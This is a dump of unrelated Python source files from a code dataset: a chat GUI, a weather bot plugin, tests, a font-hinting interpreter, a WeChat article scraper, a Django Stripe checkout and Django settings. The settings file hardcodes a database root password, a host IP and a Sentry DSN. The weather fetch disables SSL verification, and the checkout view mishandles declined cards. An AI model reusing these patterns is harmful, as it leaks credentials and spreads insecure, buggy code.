Label(self.frame_buttom, bd=1, bg='yellow')\n        self.lable_function.pack(side=TOP, ipady=5, fill=BOTH)\n\n        # input box\n        self.textpad = Text(self.frame_buttom, bd=1)\n        self.textpad.pack(side=TOP, fill=X, ipady=25)\n        self.textpad.focus_set()\n\n        # mark, tag\n        self.textpad.mark_set('mark', CURRENT)\n\n\n        # emoji, file and send buttons\n        self.button_emoji = Button(self.lable_function, text='表情', bd=1, bg='red', command=self.emoji)\n        # self.button_emoji.grid(row=0, column=1)\n        self.button_emoji.pack(side=LEFT, fill=Y)\n\n        self.button_file = Button(self.lable_function, text='文件', bd=1, bg='white', command=self.send_file)\n        # self.button_file.grid(row=0, column=2)\n        self.button_file.pack(side=LEFT, fill=Y)\n\n        self.button_send = Button(self.lable_function, text='发送', bd=1, bg='blue', command=self.send_friend)\n        # self.button_send.grid(row=0, column=3, sticky='E')\n        self.button_send.pack(side=RIGHT, fill=Y)\n\n        # # send label - adjust later when there is time\n        # self.lable_send = Label(self.frame_buttom, bg='black', bd=1)\n        # self.lable_send.pack(side=BOTTOM, fill=BOTH, ipady=5)\n\n\n\n        self.root.mainloop()\n","sub_path":"GUI/chat_window.py","file_name":"chat_window.py","file_ext":"py","file_size_in_byte":16688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"206097357","text":"# weather info source: openweathermap\n# tutorial: https://openweathermap.org/forecast5\n# sample json fetch:\n# http://api.openweathermap.org/data/2.5/forecast?appid=AAAAAAAAAAAAAAA&q=London&units=metric\n\nfrom datetime import datetime\nimport json\nimport random\n\nimport aiohttp\nfrom nonebot import get_bot\n\nfrom utils_bot.typing import Union\n\n# 'weather' for current weather instead\nURL_BASE: str = 
'http://api.openweathermap.org/data/2.5/forecast?appid='\n# +\nAPI_KEY: str = get_bot().config.OPENWEATHERMAP_API_KEY\n# +\nURL_MODE: str = '&units=metric&cnt=25&q='\n# +\n#city\n# the request URL is URL_BASE + API_KEY + URL_MODE + city, e.g.\n# http://api.openweathermap.org/data/2.5/forecast?appid=<KEY>&units=metric&cnt=25&q=London\n\n# fetch weather json data; returns None on any request failure\nasync def fetch(*city: str) -> Union[dict, None]:\n    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}\n    async with aiohttp.ClientSession() as session:\n        try:\n            async with session.get(\n                    f'{URL_BASE}{API_KEY}{URL_MODE}{city[0]}',\n                    headers=headers, timeout=10, ssl=False) as r:\n                res = json.loads(await r.text())\n                status = str(res['cod']).lower()\n                assert status == '200' or status == '404'\n                return res\n        except BaseException:\n            return None\n\n# yields weather data\ndef process_weatherdata(resJson: Union[dict, None]) -> str:\n    if resJson is None:\n        return 'Temperature data unavailable'\n    if 'list' not in resJson:\n        # append the extra hint with a 1-in-3 chance\n        return '也许地址有误?'+\\\n            ('','如果这地址是对的,私聊我订正BUG')[random.choice([0,0,1])]\n\n    # location data\n    cityChart: dict = resJson['city']\n    nation = cityChart['country']\n    city = cityChart['name'].upper()\n    timezone = cityChart['timezone']\n    reportTime = datetime.utcfromtimestamp(\n        resJson['list'][0]['dt']).strftime('%Y-%m-%d %H:%M:%S')\n\n    heading = f'''[below times are UTC]\nregion: {city}, {nation}, time diff from UTC: {timezone/60/60}h\n report time: {reportTime}\\n'''\n\n    def resGen():\n        try:\n            for j in range(0, 25, 4):\n                directChart: dict = resJson['list'][j]\n                mainChart = directChart['main']\n                weatherChart = directChart['weather'][0]\n                windChart = directChart['wind']\n                # if tempMin and tempMax are same, only display one temp\n                tempMin, tempMax = mainChart['temp_min'], mainChart['temp_max']\n                temp = (f'{tempMin}-{tempMax}°C', f'{tempMin}°C')[tempMin == tempMax]\n                yield \\\nf'''{directChart['dt_txt'][:16]}: {weatherChart['main']} ({weatherChart['description']}), {temp}\n wind: {windChart['speed']}m/s ({windChart['deg']}°), humidity: {mainChart['humidity']}, pressure: {mainChart['pressure']}hPa'''\n        except (IndexError, KeyError):\n            pass\n    return heading + '\\n'.join(resGen())\n\nasync def openweathermap_weather(*city: str):\n    return process_weatherdata(await fetch(*city))\n","sub_path":"plugins/weather/data_source_openweather.py","file_name":"data_source_openweather.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"75883825","text":"import pytest\n\nimport pandas as pd\n\nfrom numpy import uint8, logical_and\n\nfrom ebs.imports import StringIO\n\nfrom go_overlap.compute_set_overlaps.set_overlaps import _compute_go_intersections\n\ndef test_compute_go_intersections(input_gene_list_vector, gene_list_bool_array,\n                                  expected_result):\n\n    actual_result = _compute_go_intersections([input_gene_list_vector,\n                                               gene_list_bool_array])\n    print(actual_result, type(actual_result))\n    print(expected_result, type(expected_result))\n    assert actual_result.equals(expected_result)\n\n\n@pytest.fixture\ndef input_gene_list_vector():\n    s = pd.Series([1, 0, 0, 1])\n    s.name = \"a\"\n    return s\n\n\n@pytest.fixture\ndef gene_list_bool_array():\n    return pd.read_table(StringIO(\"\"\"GO:0003674 GO:0005739 GO:0005743\n1 0 0\n1 1 1\n0 1 1\n1 1 0\"\"\"), sep=\"\\s+\", dtype=uint8, header=0)\n\n\n@pytest.fixture\ndef expected_result():\n    return pd.read_table(StringIO(\"\"\"go_root a_I_go\nGO:0003674 2\nGO:0005739 1\nGO:0005743 0\"\"\"), sep=\"\\s+\", header=0, squeeze=True, 
index_col=0)\n","sub_path":"tests/test_gene_list_overlap/test_compute_gene_list_overlaps.py","file_name":"test_compute_gene_list_overlaps.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451742920","text":"#\n# hint_mindex.py\n#\n# Copyright © 2014 Monotype Imaging Inc. All Rights Reserved.\n#\n\n\"\"\"\nSupport for the MINDEX opcode.\n\"\"\"\n\n# Other imports\nfrom fontio3.hints.history import historygroup\nfrom fontio3.hints.common import doNotProceedPC\nfrom fontio3.triple.collection import Collection\n\n# -----------------------------------------------------------------------------\n\n#\n# Functions\n#\n\ndef hint_MINDEX(self, **kwArgs):\n \"\"\"\n MINDEX: Move indexed stack element, opcode 0x26\n \n >>> logger = utilities.makeDoctestLogger(\"MINDEX_test\")\n >>> _popSync, _testingState = _testFuncs()\n >>> h = _testingState(1, 2, -1, 3)\n >>> hint_MINDEX(h, logger=logger)\n >>> h.state.stack\n [2, -1, 1]\n >>> pp.PP().sequence_deep_tag_smart(\n ... h.state.pushHistory,\n ... (lambda x: False))\n 0: Extra index 1 in PUSH opcode index 0 in test\n 1: Extra index 2 in PUSH opcode index 0 in test\n 2: Extra index 0 in PUSH opcode index 0 in test\n >>> h = _testingState(10, toCollection([20, 30]), 40, toCollection([2, 3]))\n >>> hint_MINDEX(h, logger=logger)\n >>> h.state.stack[-1]\n Ranges: [(10, 40, 10)]\n >>> h.state.stack[-2]\n 40\n >>> h.state.stack[-3]\n Ranges: [(10, 40, 10)]\n >>> pp.PP().sequence_deep_tag(h.state.pushHistory)\n 0:\n Extra index 0 in PUSH opcode index 0 in test\n Extra index 1 in PUSH opcode index 0 in test\n 1:\n Extra index 2 in PUSH opcode index 0 in test\n 2:\n Extra index 0 in PUSH opcode index 0 in test\n Extra index 1 in PUSH opcode index 0 in test\n >>> h.state.stack[:] = []\n >>> h.state.changed('stack')\n >>> hint_MINDEX(h, logger=logger)\n MINDEX_test - CRITICAL - Stack underflow in test (PC 1).\n \"\"\"\n \n state = self.state\n stack = state.stack\n logger = self._getLogger(**kwArgs)\n t = self._popRemove(state, 'stack', coerceToCollection=True)\n \n if t is None:\n state.assign('pc', doNotProceedPC)\n return\n \n allIndices = set(t)\n \n if self._popRemove(state, 'pushHistory') is None:\n state.assign('pc', doNotProceedPC)\n return\n \n largestSpan = max(allIndices)\n \n if largestSpan > len(stack):\n logger.error((\n 'E6030',\n (self.ultParent.infoString, state.pc + self.ultDelta),\n \"MINDEX opcode in %s (PC %d) attempted to reach past the start \"\n \"of the stack.\"))\n \n state._validationFailed = True\n state.assign('pc', doNotProceedPC)\n return\n \n workRange = list(range(-largestSpan, 0))\n indexLists = [mindexSub(workRange, n) for n in allIndices]\n newStackPiece, newHistoryPiece = [], []\n \n for n in workRange:\n contributors = set(v[n] for v in indexLists)\n \n if len(contributors) == 1:\n resolvedIndex = contributors.pop()\n newStackPiece.append(stack[resolvedIndex])\n newHistoryPiece.append(state.pushHistory[resolvedIndex])\n \n else:\n newCollection = Collection()\n newHistoryPieces = []\n \n for resolvedIndex in contributors:\n newCollection = newCollection.addToCollection(\n stack[resolvedIndex])\n \n newHistoryPieces.append(state.pushHistory[resolvedIndex])\n \n nc2 = newCollection.toNumber()\n \n if nc2 is not None:\n newCollection = nc2\n \n newStackPiece.append(newCollection)\n newHistoryPiece.append(historygroup.HistoryGroup(newHistoryPieces))\n \n stack[-largestSpan:] = newStackPiece\n state.changed('stack')\n 
state.pushHistory[-largestSpan:] = newHistoryPiece\n    state.changed('pushHistory')\n    state.assign('pc', state.pc + 1)\n    \n    fatObj = kwArgs.get('fdefArgTracer', None)\n    \n    if fatObj is not None:\n        fatObj.notePop('stackIndex', 'MINDEX')\n        \n        if len(allIndices) > 1:\n            raise ValueError(\n                \"FDEF argument tracking cannot deal with Collections \"\n                \"as stack indices.\")\n        \n        fatObj.hint_mindex(largestSpan)\n\ndef mindexSub(v, i):\n    \"\"\"\n    Given a stack-like list and a stack index (positive), returns a new list\n    with the specified element moved to the top of the stack.\n    \n    >>> mindexSub(['a', 'b', 'c', 'd', 'e'], 2)\n    ['a', 'b', 'c', 'e', 'd']\n    >>> mindexSub(['a', 'b', 'c', 'd', 'e'], 4)\n    ['a', 'c', 'd', 'e', 'b']\n    \"\"\"\n    \n    retVal = list(v)\n    newTop = retVal[-i]\n    del retVal[-i]\n    retVal.append(newTop)\n    return retVal\n\n# -----------------------------------------------------------------------------\n\n#\n# Test code\n#\n\nif 0:\n    def __________________(): pass\n\nif __debug__:\n    from fontio3 import utilities\n    from fontio3.triple.collection import toCollection\n    from fontio3.utilities import pp\n    \n    def _testFuncs():\n        from fontio3.hints import hints_tt\n        return hints_tt._popSync, hints_tt._testingState\n\ndef _test():\n    import doctest\n    doctest.testmod()\n\nif __name__ == \"__main__\":\n    if __debug__:\n        _test()\n","sub_path":"fontio3/fontio3/hints/details/hint_mindex.py","file_name":"hint_mindex.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"274338141","text":"# Importing libraries\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.cluster import KMeans\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\n\n\n# Reading data\ncustomer = pd.read_csv('CC.csv')\nx = customer.iloc[:, 1:17]\ny = customer.iloc[:, -1]\nx = x.fillna(0)\n\n# Standardization of the data\nscaler = StandardScaler()\nscaler.fit(x)\n\n# Transforming the data with the fitted scaler\nx_scaler = scaler.transform(x)\n\n# Performing Principal Component Analysis (PCA) down to 2 dimensions\npca = PCA(2)\nx_pca = pca.fit_transform(x_scaler)\ndf2 = pd.DataFrame(data=x_pca)\nfinaldf = pd.concat([df2, customer[\"TENURE\"]], axis=1)\nprint(finaldf)\n\n# Bonus: KMeans on PCA\n# Performing K-Means clustering on the PCA data\nnclusters = 3\nkm = KMeans(n_clusters=nclusters)\nkm.fit(x_pca)\n\n# Evaluation of the clusters' accuracy\ny_cluster_KMeans = km.predict(x_pca)\nscore = metrics.silhouette_score(x_pca, y_cluster_KMeans, metric='euclidean', sample_size=42)\nprint('Silhouette Score of the Clusters using PCA is ', score)\n\n# Elbow point computation to determine the optimum number of clusters\nwcss = []\nfor i in range(1, 11):\n    kmeans = KMeans(n_clusters=i, max_iter=300, random_state=0)\n    kmeans.fit(x_pca)\n    wcss.append(kmeans.inertia_)\n\n# Plotting the elbow curve\nplt.plot(range(1, 11), wcss)\nplt.title('Elbow Method')\nplt.xlabel('Number of Clusters')\nplt.ylabel('Wcss')\nplt.show()
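\n# NOTE: the elbow is the k where WCSS (the within-cluster sum of squares exposed as\n# kmeans.inertia_) stops dropping sharply; the silhouette score above is a useful\n# cross-check, since it rewards tight, well-separated clusters on the 2-D projection.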
","sub_path":"ICP6_PK/PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"161941785","text":"import sys\nfrom random import randint\n\ndef run_guess(guessed_number, rand_number):\n    if (guessed_number == rand_number):\n        print(f'You found the right number {rand_number}')\n        return True\n    elif guessed_number > rand_number:\n        print('You guessed too high')\n        return False\n    else:\n        print('You guessed too low')\n        return False\n\nif __name__ == '__main__':\n    try:\n        num_start = int(sys.argv[1])\n        num_end = int(sys.argv[2])\n    except (IndexError, ValueError):\n        print('Please enter a valid number')\n    else:\n        if num_start <= 0:\n            print('Start number should be greater than 0')\n        elif num_end > 100:\n            print('End number should be less or equal to 100')\n        elif num_start >= num_end:\n            print('Start number should be less than end number')\n        else:\n            rand_number = randint(num_start, num_end)\n            print(f'Please guess a number between {num_start} and {num_end}')\n\n            while (True):\n                try:\n                    guessed_number = int(input('Your guess = '))\n                except ValueError:\n                    print('Please enter a valid number')\n                    continue\n                else:\n                    if (run_guess(guessed_number, rand_number)):\n                        break\n","sub_path":"6_Testing/Test_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"41078893","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author:_defined\n@Time: 2018/09/08 17:02\n@Description: search articles by keyword\n\"\"\"\nimport time\nfrom datetime import datetime\nfrom celery import group\nfrom .workers import app\nfrom ..db import (WeiChatArticle, CommonOperate, KeywordsOperate)\nfrom ..config import (max_search_page, adaptive_page, bloomfilter_article)\nfrom ..cookies import get_cookies\nfrom ..const import SearchType\nfrom ..exceptions import SpiderBanError\nfrom ..downloader import get_page\nfrom ..logger import download_logger\nfrom ..parser import (get_data, get_total_page,\n                      get_article_content, get_fulltext_url)\nfrom ..bloomfilter import BloomFilterRedis\n\n__all__ = ['crawl_page', 'crawl_content_by_page', 'search_article_by_keyword', 'execute_search_article_task']\n\nBase_Url = \"http://weixin.sogou.com/weixin?type={}&s_from=input&query={}&ie=utf8&page={}\"\n\n\n@app.task\ndef crawl_content(article_list, cookies, refer):\n    \"\"\"\n    Fetch the full content of every article in article_list.\n    :param article_list:\n    :param cookies:\n    :param refer:\n    :return:\n    \"\"\"\n    print(\"==================>crawl_content()\")\n    bloomfilter = BloomFilterRedis(key=bloomfilter_article)\n    if not article_list:\n        return ''\n    print('=====>article_list', article_list)\n    article_datas = list()\n    print(len(article_list), '=============>文章页抓取到这么多')\n    for item in article_list:\n        wx_article = WeiChatArticle()\n        if bloomfilter.is_exists(item['article_from'] + item['article_time']): # dedupe on account name + publish time\n            print('存在!!!!')\n            continue\n        html = get_page(item['article_url'], cookies, refer)\n        if not html:\n            print(\"crawl content failed, the url is {}\".format(item['article_url']))\n            download_logger.warning(\"crawl content failed, the url is {}\".format(item['article_url']))\n            continue\n        # TODO: reposts require clicking \"Read more\", so the page has to be reloaded from the new link\n        if '阅读全文' in html and 'js_share_source' in html:\n            fulltext_url = get_fulltext_url(html)\n            html = get_page(fulltext_url, cookies, refer)\n            if not html:\n                print(\"crawl content failed, the url is {}\".format(fulltext_url))\n                download_logger.warning(\"crawl content failed, the url is {}\".format(fulltext_url))\n                wx_article.date = item['article_time']\n                wx_article.title = item['article_title']\n                wx_article.abstract = item['article_abstract']\n                wx_article.account = item['article_from']\n                wx_article.url = item['article_url']\n                CommonOperate.add_one(wx_article)\n                continue\n        content_dict = get_article_content(html)\n        # [article_url, article_title, article_abstract, article_from, article_time]\n        wx_article.date = 
item['article_time']\n        wx_article.title = item['article_title']\n        wx_article.abstract = item['article_abstract']\n        wx_article.account = item['article_from']\n        wx_article.url = item['article_url']\n        wx_article.content = content_dict['content']\n        wx_article.image_urls = content_dict['image_list']\n        wx_article.source = content_dict['page_source']\n        wx_article.video = content_dict['video']\n        article_datas.append(wx_article)\n        print('================>', item['article_from'])\n    CommonOperate.add_all(article_datas)\n\n\n@app.task\ndef crawl_page(keyword):\n    \"\"\"\n    Crawl the search result pages for a keyword.\n    :param keyword:\n    :return:\n    \"\"\"\n    cur_page = 1\n    wait2crawl_page = max_search_page\n    cookies = get_cookies()\n    # the Refer header must always be sent\n    while cur_page <= wait2crawl_page:\n        print(\"====>抓取第{}页\".format(cur_page))\n        url = Base_Url.format(SearchType.article, keyword, cur_page)\n        refer = Base_Url.format(SearchType.article, keyword, cur_page if cur_page == 1 else cur_page - 1)\n        try:\n            html = get_page(url, cookies, {'Refer': refer})\n        except SpiderBanError as e:\n            download_logger.error(e)\n            continue\n        if html:\n            article_list = get_data(html)\n            if cur_page == 1:\n                if adaptive_page:\n                    wait2crawl_page = get_total_page(html)\n            crawl_content(article_list, cookies, {'Refer': refer})\n        cur_page += 1\n        time.sleep(10)\n\n\n@app.task\ndef crawl_content_by_page(page_num):\n    pass\n\n\n@app.task\ndef search_article_by_keyword(keyword_object):\n    expire = datetime.strptime(keyword_object[4], \"%Y-%m-%d %H:%M:%S\")\n    time_now = datetime.now()\n    if time_now <= expire:\n        crawl_page(keyword_object[1])\n    else:\n        return '' # if expired, do nothing, just return\n\n\n@app.task\ndef execute_search_article_task():\n    keyword_objects = KeywordsOperate.get_search_keywords()\n    caller = group(search_article_by_keyword.s(kw_obj) for kw_obj in keyword_objects)\n    caller.delay()\n
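\n# NOTE: group(...) collects one task signature per keyword and .delay() enqueues them\n# all at once, so each search_article_by_keyword job can run on any available worker.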
","sub_path":"WeChatSpider/tasks/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"626682181","text":"\"\"\"This file contains all code used for creating a distance metric between two\nimages - generally a candidate image and a target image\"\"\"\n\n\nimport sys\n\nimport numpy as np\n\n\ndef get_hausdorff_dist(px, distances_black, distances_white):\n\t\"\"\"Finds the hausdorff distance between the candidate pixels\n\tand the target pixels. This is the maximum shortest distance\n\tbetween a pixel in px and a pixel in targ_px. In this case,\n\tthe average of a certain percentage of pixel values is taken,\n\tsuch as the 10 worst pixels in the shape.\n\t\"\"\"\n\n\t# NOTE: considered a black pixel if value above .3!\n\n\t# accumulate a distance value for every pixel in the output\n\tall_dist = []\n\tfor index in range(len(px)):\n\t\tif(px[index] >= .3):\n\t\t\tall_dist.append(distances_black[index])\n\t\telse:\n\t\t\tall_dist.append(distances_white[index])\n\n\t# return the total distance across all pixels; precomputing distances_black and\n\t# distances_white once per target turns this into a flat lookup-and-sum\n\ttotal_dist = np.sum(np.array(all_dist))\n\n\treturn total_dist\n\n\n\ndef get_dist_mat(targ_pix, px_val):\n\t\"\"\"Creates a matrix that finds, for every pixel in the target\n\tpixel matrix, the euclidian distance to the nearest pixel with\n\tvalue px_val in the target pixel matrix\n\t\"\"\"\n\n\t# find the locations of all matching pixels\n\tpx_locs = get_pixel_locs(targ_pix, px_val)\n\n\t# instantiate result matrix with all 0s\n\tresult_mat = np.zeros(targ_pix.shape)\n\n\t# find length between each possible location and the closest matching pixel\n\tfor r in range(len(targ_pix)):\n\t\tfor c in range(len(targ_pix[0])):\n\t\t\t# if the pixel already has value px_val its closest distance is 0,\n\t\t\t# otherwise find the closest matching pixel\n\t\t\tif(targ_pix[r][c] != px_val):\n\t\t\t\tclosest = get_closest_point((r, c), px_locs)\n\t\t\t\tresult_mat[r][c] = closest\n\n\treturn result_mat.flatten()\n\n\ndef get_pixel_locs(targ_pix, px_val):\n\t\"\"\"Method that finds the (row, col) locations of all pixels with\n\tvalue px_val in a target image matrix\"\"\"\n\n\tpx_locs = []\n\tfor r in range(len(targ_pix)):\n\t\tfor c in range(len(targ_pix[0])):\n\t\t\tif(targ_pix[r][c] == px_val):\n\t\t\t\tpx_locs.append((r, c))\n\n\treturn px_locs\n\n\ndef get_euclidian_dist(pos, other_pos):\n\t\"\"\"Finds the euclidian distance between two (x, y) position\n\ttuples\"\"\"\n\n\treturn np.sqrt(np.square(pos[0] - other_pos[0]) + np.square(pos[1] - other_pos[1]))\n\n\ndef get_closest_point(pos_tup, all_pos):\n\t\"\"\"Finds all euclidian distances between the current row\n\tand column position (in pos_tup) and every (row, column)\n\tposition tuple in all_pos and returns the closest one\n\t\"\"\"\n\n\t# initialize closest to be a very large number\n\tclosest = sys.maxsize\n\n\t# go through all other pixels and find the closest one\n\tfor other in all_pos:\n\t\tcurr_dist = get_euclidian_dist(pos_tup, other)\n\t\tif(curr_dist < closest):\n\t\t\tclosest = curr_dist\n\n\treturn closest\n\n\nif __name__ == '__main__':\n\t\"\"\"Used to run simple tests on methods\"\"\"\n\t# both distance maps are needed: nearest-black (value 1) and nearest-white (value 0)\n\tx = np.array([[1,0,0,0],[0,0,0,0],[0,0,0,0]])\n\tdist_black = get_dist_mat(x, 1)\n\tdist_white = get_dist_mat(x, 0)\n\tz = np.array([1,0,0,1,1,1,1,0,0,1,1,1])\n\tprint(get_hausdorff_dist(z, dist_black, dist_white))\n","sub_path":"FULL_CPPN_disthelp.py","file_name":"FULL_CPPN_disthelp.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"278273680","text":"import unittest\nimport sys, os\nimport random\nimport shutil\nimport itertools\n\nimport torch\n\nfrom bauta.DatasetGenerator import DatasetGenerator\nfrom bauta.utils.SystemUtils import SystemUtils\nfrom bauta.Trainer import Trainer\n\nclass TestTrainer(unittest.TestCase):\n\n    def files(datasets_with_attributes):\n        dataset = [element['dataset'] for element in datasets_with_attributes]\n        if len(dataset) > 0 and len(dataset[0]) > 0:\n            return {element[1] for element in dataset[0][0]}\n        else:\n            return {}\n\n    def createDataset():\n        system_utils = 
SystemUtils()\n images_path = f'/tmp/{random.randint(0, 100000)}'\n data_path = f'/tmp/{random.randint(0, 100000)}'\n system_utils.makeDirIfNotExists(images_path)\n squares_image_path = f'{images_path}/square.txt'\n with open(f'{images_path}/square.txt','w') as file:\n file.write('./test/data/images/square/square_1.png\\n./test/data/images/square/square_2.png')\n circles_image_path = f'{images_path}/circle.txt'\n with open(f'{images_path}/circle.txt','w') as file:\n file.write('./test/data/images/circle/circle_1.png\\n./test/data/images/circle/circle_2.png')\n backgrounds_image_path = f'{images_path}/background.txt'\n with open(f'{images_path}/background.txt','w') as file:\n file.write('./test/data/images/background/background_1.png\\n./test/data/images/background/background_2.png')\n dataset_generator = DatasetGenerator(data_path)\n datasets_with_attributes = dataset_generator.generateDatasetFromListOfImages(images_path, 0.5, 5)\n with open(f'{data_path}/config.yaml','a') as file:\n file.write(\"\\ndata_sampling:\\n\")\n file.write(\" probability_using_cache: 0.0\\n\")\n return images_path, data_path\n\n def removeDataset(images_path, data_path):\n shutil.rmtree(images_path)\n shutil.rmtree(data_path)\n\n\n def test_focalLoss(self):\n all_objects_in_image = torch.ones(1, 3)\n targets = torch.zeros(1, 3, 8, 8)\n targets[0, 0, 0:8, 0:7] = 1\n targets[0, 1, 0:8, 7:8] = 1\n targets[0, 2, :, :] = 0\n outputs = torch.zeros(1, 3, 8, 8)\n outputs[0, 0, 0:8, 0:3] = 1 # ~50% wrong\n outputs[0, 1, 0:8, 0:7] = 1 # ~700% wrong\n outputs[0, 2, 0:8, 0:8] = 0 # 100% correct\n loss = Trainer.focalLoss(outputs, targets, all_objects_in_image)\n self.assertTrue(loss[0] / 50 < 1.1)\n self.assertTrue(loss[1] / 700 < 1.1)\n self.assertTrue(loss[2] < 1e-3)\n\n def test_train_within_epoch_improves_loss(self):\n images_path, data_path = TestTrainer.createDataset()\n trainer = Trainer(data_path, visual_logging=False, reset_model=True, num_epochs=4, batch_size=1, learning_rate=0.01, momentum=0.1, gpu=0, \\\n loss_scaled_weight=0.5, loss_unscaled_weight=0.5, only_masks=True)\n trainer.train()\n TestTrainer.removeDataset(images_path, data_path)\n best_test_loss = min(trainer.test_loss_history)\n self.assertTrue((trainer.test_loss_history[0] - best_test_loss) / trainer.test_loss_history[0] > 0.01)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/TestTrainer.py","file_name":"TestTrainer.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490053186","text":"from django.shortcuts import render, get_object_or_404, HttpResponse,redirect\nfrom products.models import Product\nfrom .forms import MakePaymentForm, OrderForm\nfrom .models import OrderLineItem\nfrom django.conf import settings\nimport stripe\nfrom django.contrib import messages\n\nstripe.api_key=settings.STRIPE_SECRET_KEY\n\n\n# Create your views here.\n\ndef get_cart_items_and_total(cart):\n cart_items = []\n cart_total = 0\n for product_id, quantity in cart.items():\n product = get_object_or_404(Product, pk=product_id)\n \n cart_items.append({\n 'id': product.id,\n 'name': product.name,\n 'brand': product.brand,\n 'image': product.image,\n 'price': product.price,\n 'quantity': quantity,\n 'total': product.price * quantity\n })\n cart_total += product.price * quantity\n \n return {'cart_items': cart_items, 'cart_total':cart_total}\n\ndef show_checkout(request):\n \n cart = request.session.get('cart', {})\n cart_items_and_total = 
get_cart_items_and_total(cart)\n \n \n payment_form = MakePaymentForm()\n order_form = OrderForm()\n \n context = {\n \"payment_form\": payment_form, \n \"order_form\" : order_form,\n \"publishable\": settings.STRIPE_PUBLISHABLE_KEY\n }\n \n context.update(cart_items_and_total)\n \n return render(request, \"checkout/checkout.html\", context)\n\ndef submit_payment(request):\n \n cart = request.session.get('cart', {})\n cart_items_and_total = get_cart_items_and_total(cart)\n \n \n payment_form=MakePaymentForm(request.POST)\n \n order_form=OrderForm(request.POST)\n \n if order_form.is_valid() and payment_form.is_valid():\n \n \n # Grab the money and run\n total = cart_items_and_total['cart_total']\n stripe_token=payment_form.cleaned_data['stripe_id']\n\n try:\n\n total_in_cent = int(total*100)\n customer = stripe.Charge.create(\n amount=total_in_cent,\n currency=\"EUR\",\n description=\"Dummy Transaction\",\n card=stripe_token,\n )\n\n except stripe.error.CardError:\n print(\"Declined\")\n messages.error(request, \"Your card was declined!\")\n\n if customer.paid:\n print(\"Paid\")\n messages.error(request, \"You have successfully paid\")\n\n\n\n\n\n order=order_form.save()\n \n cart=request.session.get('cart',{})\n \n for product_id, quantity in cart.items():\n Line_item=OrderLineItem()\n Line_item.product_id=product_id\n Line_item.quantity=quantity\n Line_item.order=order\n Line_item.save()\n del request.session['cart']\n \n return redirect(\"/\") \n \n \n \n \n \n \n return HttpResponse(str(order.id))\n\n","sub_path":"checkout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"340463453","text":"\"\"\"\n@Author : liuwei\n@Version : \n------------------------------------\n@File : local_settings.py\n@Description : \n@CreateTime : 2020/3/12 16:30\n\"\"\"\n#############################\n# system settings\n#############################\nfrom kombu import Exchange, Queue\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'search',\n 'USER': 'root',\n 'PASSWORD': '123456',\n 'HOST': '62.234.146.101',\n 'PORT': '13306',\n }\n}\n\nSESSION_ENGINE = \"django.contrib.sessions.backends.cache\"\nSESSION_CACHE_ALIAS = \"default\"\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": \"redis://127.0.0.1:6379/1\",\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n }\n }\n}\nCACHE_REDIS_EXPIRE = 60*60\n\n#############################\n# third party app settings\n#############################\n# sentry\nSENTRY_DSN = \"http://cb1b4f982c7142dab41c1324ab3d7459@localhost:9000/3\"\n\n\n#############################\n# my app settings\n#############################\nITM_DOAMIN = \"http://128.194.224.146:8000\"\nBUILDER = {\n \"ES_HOSTS\": [\"http://62.234.146.101:9200\"]\n}\n\n#############################\n# celery setting.\n#############################\nfrom datetime import timedelta\nfrom celery.schedules import crontab\nCELERY_TIMEZONE = 'Asia/Shanghai'\nCELERY_ENABLE_UTC = True\n\nCELERY_ACCEPT_CONTENT = ['json']\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_ACKS_LATE = True\nCELERYD_FORCE_EXECV = True\nCELERYD_MAX_TASKS_PER_CHILD = 100\nCELERYD_TASK_TIME_LIMIT = 12*30\n\nCELERY_BROKER_URL = 'redis://127.0.0.1:6379/2'\nCELERY_RESULT_BACKEND = 'redis://127.0.0.1:6379/2'\n# CELERY_CACHE_BACKEND = 'django-cache'\n\nCELERY_BEAT_SCHEDULER = 
